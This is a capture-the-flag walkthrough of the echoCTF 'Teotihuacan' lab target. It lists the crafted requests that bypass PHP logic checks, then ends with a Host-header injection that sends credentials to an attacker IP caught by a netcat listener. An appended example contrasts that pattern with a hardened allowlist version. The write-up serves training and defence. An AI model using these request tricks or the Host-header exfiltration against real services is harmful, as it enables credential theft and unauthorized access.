Teotihuacan – Walk Through – echoCTF

IP Address: 10.0.30.190
Description: Just like the pyramids of Teotihuacán, this target feels like a step-pyramid
Extra Info: Just like a step-pyramid from Teotihuacán, you have to climb step-by-step until you reach the top. You have to get the following flags

Steps:
Like any other target, we start by simply entering the IP address in a browser.
Opening http://10.0.30.190/ returns some PHP code, and anyone with basic PHP skills will know what this code does.
Now we enter http://10.0.30.190/?hasAdminAccess=true in a browser to get our first flag.
ETSCTF_x

Along with the flag, we got a message that says “The next challenge is located at switch_and_twist” and a link to http://10.0.30.190/switch_and_twist/

Now again we have a piece of PHP code but this time it requires some intermediate PHP skills to understand what this code does.

Using Postman, we have to send the below request:
http://10.0.30.190/switch_and_twist/
hmac=" "
host="asdasdasd"
nonce=""
Note: I had to debug this PHP code on local Apache to fully understand its logic.

Now we got our second flag ETSCTF_xx with the message “The next challenge is located at overprinting” and a link to http://10.0.30.190/overprinting/

Again, we are presented with PHP code and this time, it requires basic arithmetic knowledge along with advanced PHP understanding.

After some trial and error with this PHP code on a local Apache server, we finally get the code required to pass this challenge.
http://10.0.30.190/overprinting/?print=print=111111

As a result, we get our third flag:
“The next challenge is located at /got_creds/ ETSCTF_xxx”

If you really know PHP well, you will notice a second logic path in this code, which leads us to another code:
http://10.0.30.190/overprinting/?print=011111

As expected, this code gives us our fourth flag:
“Awesome work, here is anothe flag for your troubles ETSCTF_xxxx”

Now we hit http://10.0.30.190/got_creds/ and get some NodeJS code.
This code is fairly simple and doesn’t require any deep NodeJS skills.

From the NodeJS code we get a link to http://10.0.30.190/got_creds/example

Upon hitting the above link, we get a JSON response with our fifth flag:
{"body":{"ETSCTF":"ETSCTF_xxxxx"}}

There are no more hints at this point, so the remaining flag must come from the NodeJS code itself.
On close inspection, we see this call:
http.get(`http://${req.headers.host}?auth=${JSON.stringify(credentials)}`

Using Postman, we have to send a request to http://10.0.30.190/got_creds/example with the “Host” header set to our attacker IP, which in our case is “10.10.0.123”.

Before sending the above request, we have to run a netcat listener on our attacker machine using the command:
nc -nlvp 80

As soon as we send the request from Postman, we get our sixth and final flag on the netcat listener:
ETSCTF_xxxxxx
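
The last step works because the server builds an outbound URL from the client-controlled Host header and puts the credentials in the query string. The following is an added example, not the challenge's source or the author's code, that places that pattern beside a hardened form; `AUTH_ORIGIN`, `ALLOWED_HOSTS`, the hostnames and the credentials are constructed assumptions.

```javascript
// Constructed values (assumptions, not taken from the challenge source).
const AUTH_ORIGIN = "http://auth.internal.example:8080"; // fixed upstream from server config
const ALLOWED_HOSTS = new Set(["app.example", "app.example:8080"]);

// The pattern quoted above: the client-supplied Host header picks the destination,
// and the credentials ride along in the query string.
function vulnerableUrl(req, credentials) {
  return `http://${req.headers.host}?auth=${JSON.stringify(credentials)}`;
}

// Accept only a plain host[:port] that is on the allowlist.
function isTrustedHost(hostHeader, allowed = ALLOWED_HOSTS) {
  if (typeof hostHeader !== "string") return false;
  const host = hostHeader.trim().toLowerCase();
  // Letters, digits, dots, hyphens and an optional numeric port only;
  // anything containing '/', '@', '?', '#' or whitespace is rejected.
  if (!/^[a-z0-9.-]+(:\d{1,5})?$/.test(host)) return false;
  return allowed.has(host);
}

// Hardened form: the destination comes from configuration, never from the request,
// and the credentials go in the request body instead of the URL.
function hardenedRequest(req, credentials) {
  if (!isTrustedHost(req.headers.host)) {
    return { ok: false, status: 400, reason: "untrusted Host header" };
  }
  return {
    ok: true,
    url: new URL("/", AUTH_ORIGIN).href,
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify(credentials),
  };
}

// Constructed requests for illustration.
const credentials = { user: "svc", pass: "constructed-secret" };
const normal = { headers: { host: "app.example" } };
const spoofed = { headers: { host: "203.0.113.7" } };

console.log(vulnerableUrl(spoofed, credentials));      // destination follows the Host header
console.log(hardenedRequest(spoofed, credentials));    // rejected before any outbound call
console.log(hardenedRequest(normal, credentials).url); // always the configured upstream
```

On the detection side, a Host header that does not match any name the service is deployed under is worth logging and alerting on at the reverse proxy.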

That’s all.

If you feel something is confusing, please feel free to write in comments.

Thanks to echoCTF for providing this CTF 🙂
